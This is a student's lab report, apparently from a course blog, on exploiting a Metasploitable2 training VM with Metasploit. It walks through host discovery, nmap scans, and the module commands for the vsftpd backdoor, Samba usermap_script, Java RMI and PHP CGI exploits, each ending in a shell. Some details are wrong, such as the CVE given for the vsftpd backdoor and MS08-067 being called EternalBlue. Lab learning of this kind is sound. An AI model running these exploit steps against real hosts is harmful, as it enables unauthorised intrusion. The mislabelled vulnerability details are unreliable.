20222412 2024-2025-1 《网络与系统攻防技术》实验六实验报告

20222412 2024-2025-1 《网络与系统攻防技术》实验六实验报告

1.实验内容

主要任务:基于Metasploit框架,实现漏洞利用。

Metasploit框架(MSF)由HD Moore于2003年发布,并在2007年使用Ruby语言重写。它提供了一套完整的渗透测试框架,包括漏洞利用模块、攻击载荷、辅助模块、编码器、空指令和后渗透模块等多个组件。这些组件使得Metasploit成为信息安全与渗透测试领域最流行的工具之一。

  1. 主要功能
    • 信息收集:通过各种辅助模块进行端口扫描、服务识别等,帮助渗透测试人员了解目标系统的信息。
    • 漏洞探测:内置数千个已知的软件漏洞,并持续更新以应对新兴的安全威胁。
    • 漏洞利用:利用目标系统中的已知漏洞进行攻击,这是Metasploit的核心功能之一。
    • 后渗透攻击:在取得目标系统控制权后,执行进一步的攻击动作,如获取敏感信息、实施跳板攻击等。
  2. 主要组件
    • Exploits(漏洞利用模块):负责利用目标系统的漏洞进行攻击。
    • Payloads(攻击载荷):在成功利用漏洞后执行的代码或指令,用于实现特定的攻击目的。
    • Auxiliary(辅助模块):执行信息收集、扫描、嗅探等功能,辅助渗透测试。
    • Encoders(编码器):对Payload进行加密,以绕过安全软件的检测。
    • NOPs(空指令):提高Payload的稳定性和可靠性。
    • Post(后渗透模块):在取得目标系统控制权后,执行进一步的攻击动作。

2.实验过程

  • kali攻击机ip:192.168.191.130
  • Metasploitable2靶机ip:192.168.191.152

2.1 前期渗透

2.1.1 主机发现

使用辅助模块中的arp_sweep实现主机发现。

msfconsole

搜索模块并应用模块

search arp_sweep
use auxiliary/scanner/discovery/arp_sweep

设置扫描参数,并启动

set RHOSTS 192.168.191.152  //设置目标ip
run  //启动模块

可以看到,主机存在,并且还能知道这台主机是使用的VMware虚拟网卡。

2.1.2 端口扫描

使用nmap对目标主机端口进行扫描

nmap -v 192.168.191.152  //此处我启用的是加强扫描

可以看到靶机开放端口,后续攻击都是基于这些开放的端口的漏洞进行攻击。

2.1.3 扫描系统版本、漏洞

nmap -sV -O 192.168.191.152  //扫描服务版本和操作系统版本

可以看到服务版本为:metasploitable.localdomain, irc.Metasploitable.LAN

操作系统版本可能为:Linux 2.6.9 - 2.6.33

nmap提供了脚本vuln用以实现常见漏洞扫描。

nmap --script=vuln 192.168.191.152

可以看到常见漏洞,例如MS08_067(永恒之蓝)等。

2.2 Vsftpd源码包后门漏洞(21端口)

2.2.1 漏洞原理

Vsftpd源码包后门漏洞是一个严重的安全漏洞,被称为“笑脸漏洞”或CVE-2012-1971。

vsftpd是一个常用的FTP服务器软件,但在其2.3.4版本中存在一个后门漏洞。当用户在登录时输入的用户名以特定字符结尾时(如笑脸符号“😃”),服务器会在6200端口打开一个监听的shell,并且该服务是以root权限运行的。这意味着攻击者可以通过这个后门获得未经授权的访问权限,并执行任意代码。

为了利用这个漏洞,攻击者需要先确认目标系统上是否运行了vsftpd 2.3.4版本,并且21端口是开放的。然后,他们可以尝试使用带有特定字符的用户名进行登录,并在成功后通过6200端口连接来获取系统的控制权。

2.2.2 漏洞复现

查找并选择漏洞模块

search vsftp
use exploit/unix/ftp/vsftpd_234_backdoor

设置参数,开始攻击

show options
set RHOST 192.168.191.152  //靶机ip
run

可以看攻击成功,输入pwd、 id、ls等命令,成功运行。

2.3 SambaMS-RPC Shell命令注入漏洞(端口139)

2.3.1 漏洞原理

Samba是一套可使UNIX系列的操作系统与微软Windows操作系统的SMB/CIFS网络协议做连结的自由软件。该软件支持共享打印机、互相传输资料文件等。

Samba在处理用户数据时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上执行任意命令。具体来说,Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。

Samba版本3.0.20到3.0.25rc3当使用非默认用户名映射脚本配置选项时受到此漏洞影响。由于此选项用于在身份验证之前映射用户名,因此不需要身份验证来利用此漏洞。

2.3.2 漏洞复现

查找并选择漏洞模块

search samba
use exploit/multi/samba/usermap_script

设置参数,开始攻击

show options
set RHOST 192.168.191.152  //靶机ip
run

连接成功,执行uname–a、ls等验证,攻击成功

2.4 Java RMI SERVER命令执行漏洞(1099端口)

2.4.1 漏洞原理

Java RMI(Remote Method Invocation)是一种允许在不同Java虚拟机之间进行方法调用的分布式计算技术,它使得一个JVM上的对象能够调用另一个JVM上对象的方法,就像调用本地对象一样。Java RMI SERVER命令执行漏洞主要涉及序列化和反序列化过程中的安全风险。

Java RMI默认使用序列化来完成所有的交互,这使得它容易受到反序列化攻击的影响。如果RMI服务的1099端口暴露在公网上,并且使用了存在漏洞的Apache Commons Collections版本,攻击者就可以在该服务器上执行相关命令。该漏洞允许攻击者在目标系统上执行任意代码,可能导致数据泄露、系统被控制等严重后果。由于RMI服务广泛应用于各种Java应用中,因此这个漏洞的影响范围非常广泛。

2.4.2 漏洞利用

查找并选择漏洞模块

search rmi
use exploit/multi/misc/java_rmi_server

设置参数,开始攻击

show options
set RHOST 192.168.191.152  //靶机ip
run

可以看到成功建立会话,输入shell启动shell并使用ls测试验证

2.5 PHP CGI参数执行注入漏洞(80端口)

2.5.1 漏洞原理

2.5.2 漏洞复现

查找并选择漏洞模块

search php_cgi
use exploit/multi/http/php_cgi_arg_injection

设置参数,开始攻击

show options
set RHOST 192.168.191.152  //靶机ip
run

可以看到成功建立会话,输入shell启动shell并使用ls测试验证

3.问题及解决方案

这次实验真没啥问题,相比于考试的内容更简单,所有问题在做作业的时候都解决了。

4.学习感悟、思考等

本次渗透测试实验涵盖了多个常见的漏洞类型,从主机发现到具体漏洞的利用,每一步都让我深刻体会到网络安全的重要性。每个漏洞的存在都有其根本原因,如软件更新不及时、配置不当或缺乏必要的安全措施。

通过这次实际操作的经历,我不仅学会了如何使用各种工具和技术来进行有效的渗透测试——包括信息收集工具Nmap、漏洞扫描器Nessus、Web应用扫描工具OWASP ZAP等,更重要的是认识到了安全防护是一个多层次的概念。这意味着我们需要从多个角度出发考虑安全问题:对于开发者而言,在编写代码时就应该遵循最佳实践原则,并定期对项目进行代码审查以发现潜在问题;对于运维人员来说,则需要确保所有系统都安装了最新的补丁,并且正确配置了访问控制列表和其他安全设置;同时,企业还应该建立一套完善的应急响应机制,以便在发生安全事件时能够迅速采取行动减少损失。

此外,我还意识到持续学习与实践对于提升个人技能至关重要。随着黑客技术不断进步和发展,只有保持好奇心并紧跟行业趋势才能使自己处于有利地位。因此,未来我计划深入学习更多高级的安全技术和方法论,比如逆向工程、加密算法分析等,同时也希望通过参与比赛等形式锻炼自己的实战能力

posted @ 2024-11-18 15:48  wwwwyg  阅读(7)  评论(0编辑  收藏  举报